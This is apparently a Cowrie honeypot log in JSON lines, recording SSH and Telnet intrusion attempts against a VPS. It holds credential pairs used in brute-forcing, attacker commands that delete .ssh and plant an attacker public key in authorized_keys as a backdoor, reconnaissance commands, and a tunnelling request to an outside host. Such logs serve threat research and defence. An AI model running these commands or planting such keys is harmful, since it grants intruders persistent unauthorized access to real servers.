{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:19.455510Z","src_ip":"212.227.235.229","session":"936d32368de7"}
{"eventid":"cowrie.session.closed","duration":12.850113868713379,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:19.581402Z","src_ip":"115.63.50.75","session":"bbe275989e71"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":45307,"dst_ip":"1.2.3.4","dst_port":23,"session":"a370b4e000be","protocol":"telnet","message":"New connection: 115.63.50.75:45307 (1.2.3.4:23) [session: a370b4e000be]","sensor":"my-vps","timestamp":"2025-08-28T14:49:19.733100Z"}
{"eventid":"cowrie.session.closed","duration":12.797836542129517,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:32.530879Z","src_ip":"115.63.50.75","session":"a370b4e000be"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":45649,"dst_ip":"1.2.3.4","dst_port":23,"session":"99f8a2e08d06","protocol":"telnet","message":"New connection: 115.63.50.75:45649 (1.2.3.4:23) [session: 99f8a2e08d06]","sensor":"my-vps","timestamp":"2025-08-28T14:49:32.701291Z"}
{"eventid":"cowrie.session.closed","duration":12.837859630584717,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:45.539084Z","src_ip":"115.63.50.75","session":"99f8a2e08d06"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":45978,"dst_ip":"1.2.3.4","dst_port":23,"session":"42eb8c64d7a7","protocol":"telnet","message":"New connection: 115.63.50.75:45978 (1.2.3.4:23) [session: 42eb8c64d7a7]","sensor":"my-vps","timestamp":"2025-08-28T14:49:45.724072Z"}
{"eventid":"cowrie.session.closed","duration":"42.7","message":"Connection lost after 42.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:47.594790Z","src_ip":"212.227.125.160","session":"d91395b9ca95"}
{"eventid":"cowrie.session.closed","duration":12.820156812667847,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:49:58.544127Z","src_ip":"115.63.50.75","session":"42eb8c64d7a7"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":46311,"dst_ip":"1.2.3.4","dst_port":23,"session":"602840e63ed7","protocol":"telnet","message":"New connection: 115.63.50.75:46311 (1.2.3.4:23) [session: 602840e63ed7]","sensor":"my-vps","timestamp":"2025-08-28T14:49:58.731157Z"}
{"eventid":"cowrie.session.closed","duration":12.80176854133606,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:50:11.532856Z","src_ip":"115.63.50.75","session":"602840e63ed7"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":46649,"dst_ip":"1.2.3.4","dst_port":23,"session":"8aa9d4cb3d56","protocol":"telnet","message":"New connection: 115.63.50.75:46649 (1.2.3.4:23) [session: 8aa9d4cb3d56]","sensor":"my-vps","timestamp":"2025-08-28T14:50:11.701334Z"}
{"eventid":"cowrie.session.closed","duration":12.811301946640015,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:50:24.512561Z","src_ip":"115.63.50.75","session":"8aa9d4cb3d56"}
{"eventid":"cowrie.session.connect","src_ip":"115.63.50.75","src_port":46963,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f9040323b5e","protocol":"telnet","message":"New connection: 115.63.50.75:46963 (1.2.3.4:23) [session: 0f9040323b5e]","sensor":"my-vps","timestamp":"2025-08-28T14:50:24.692023Z"}
{"eventid":"cowrie.session.closed","duration":12.747603416442871,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:50:37.439536Z","src_ip":"115.63.50.75","session":"0f9040323b5e"}
{"eventid":"cowrie.session.connect","src_ip":"2.38.136.97","src_port":55280,"dst_ip":"1.2.3.4","dst_port":23,"session":"d631b3f7cc3d","protocol":"telnet","message":"New connection: 2.38.136.97:55280 (1.2.3.4:23) [session: d631b3f7cc3d]","sensor":"my-vps","timestamp":"2025-08-28T14:50:43.204520Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40280,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e915732f689","protocol":"ssh","message":"New connection: 212.227.235.229:40280 (1.2.3.4:22) [session: 1e915732f689]","sensor":"my-vps","timestamp":"2025-08-28T14:50:51.113796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:50:51.114509Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:50:51.355400Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd@123!","message":"login attempt [root/passwd@123!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:50:52.361473Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:50:53.241090Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:50:53.241852Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:50:53.243246Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:50:53.483955Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:50:53.985759Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T14:50:53.986458Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T14:50:54.227928Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:50:54.228957Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41046,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fec87c86bf1","protocol":"ssh","message":"New connection: 212.227.235.229:41046 (1.2.3.4:22) [session: 9fec87c86bf1]","sensor":"my-vps","timestamp":"2025-08-28T14:50:54.466333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:50:54.467321Z","src_ip":"212.227.235.229","session":"9fec87c86bf1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:50:54.707369Z","src_ip":"212.227.235.229","session":"9fec87c86bf1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T14:50:55.704977Z","src_ip":"212.227.235.229","session":"9fec87c86bf1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:50:56.946116Z","src_ip":"212.227.235.229","session":"9fec87c86bf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41588,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0eff6c24acf","protocol":"ssh","message":"New connection: 212.227.235.229:41588 (1.2.3.4:22) [session: d0eff6c24acf]","sensor":"my-vps","timestamp":"2025-08-28T14:50:57.186159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:50:57.187161Z","src_ip":"212.227.235.229","session":"d0eff6c24acf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:50:57.429060Z","src_ip":"212.227.235.229","session":"d0eff6c24acf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:50:58.438126Z","src_ip":"212.227.235.229","session":"d0eff6c24acf"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:50:58.681503Z","src_ip":"212.227.235.229","session":"1e915732f689"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:50:58.682819Z","src_ip":"212.227.235.229","session":"d0eff6c24acf"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":58756,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f4289c44e7d","protocol":"ssh","message":"New connection: 186.225.142.90:58756 (1.2.3.4:22) [session: 5f4289c44e7d]","sensor":"my-vps","timestamp":"2025-08-28T14:51:07.211737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:51:07.344390Z","src_ip":"186.225.142.90","session":"5f4289c44e7d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T14:51:07.595209Z","src_ip":"186.225.142.90","session":"5f4289c44e7d"}
{"eventid":"cowrie.login.success","username":"root","password":"100851%12344","message":"login attempt [root/100851%12344] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:51:08.838479Z","src_ip":"186.225.142.90","session":"5f4289c44e7d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:51:09.419724Z","src_ip":"186.225.142.90","session":"5f4289c44e7d"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-28T14:51:09.420561Z","src_ip":"186.225.142.90","session":"5f4289c44e7d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:51:09.652331Z","src_ip":"186.225.142.90","session":"5f4289c44e7d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:51:09.681365Z","src_ip":"186.225.142.90","session":"5f4289c44e7d"}
{"eventid":"cowrie.session.closed","duration":31.06761646270752,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:51:14.272054Z","src_ip":"2.38.136.97","session":"d631b3f7cc3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38090,"dst_ip":"1.2.3.4","dst_port":23,"session":"37fbd6b8acb0","protocol":"telnet","message":"New connection: 212.227.235.229:38090 (1.2.3.4:23) [session: 37fbd6b8acb0]","sensor":"my-vps","timestamp":"2025-08-28T14:51:34.315924Z"}
{"eventid":"cowrie.session.closed","duration":34.34228467941284,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:52:08.658120Z","src_ip":"212.227.235.229","session":"37fbd6b8acb0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42281,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d1781772e94","protocol":"ssh","message":"New connection: 212.227.235.229:42281 (1.2.3.4:22) [session: 3d1781772e94]","sensor":"my-vps","timestamp":"2025-08-28T14:52:18.812637Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:52:18.813728Z","src_ip":"212.227.235.229","session":"3d1781772e94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42594,"dst_ip":"1.2.3.4","dst_port":22,"session":"0269f750fc1b","protocol":"ssh","message":"New connection: 212.227.235.229:42594 (1.2.3.4:22) [session: 0269f750fc1b]","sensor":"my-vps","timestamp":"2025-08-28T14:52:19.954225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:52:19.955275Z","src_ip":"212.227.235.229","session":"0269f750fc1b"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T14:52:20.095221Z","src_ip":"212.227.235.229","session":"0269f750fc1b"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:52:20.501735Z","src_ip":"212.227.235.229","session":"0269f750fc1b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T14:52:20.639153Z","session":"0269f750fc1b"}
{"eventid":"cowrie.session.connect","src_ip":"58.33.58.37","src_port":35598,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0011b0ef315","protocol":"ssh","message":"New connection: 58.33.58.37:35598 (1.2.3.4:22) [session: d0011b0ef315]","sensor":"my-vps","timestamp":"2025-08-28T14:52:31.954729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:52:31.955723Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:52:32.152500Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.login.success","username":"root","password":"Server2022","message":"login attempt [root/Server2022] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:52:32.980551Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:52:33.390199Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:52:33.390954Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:52:33.392119Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:52:33.589955Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:52:34.041301Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
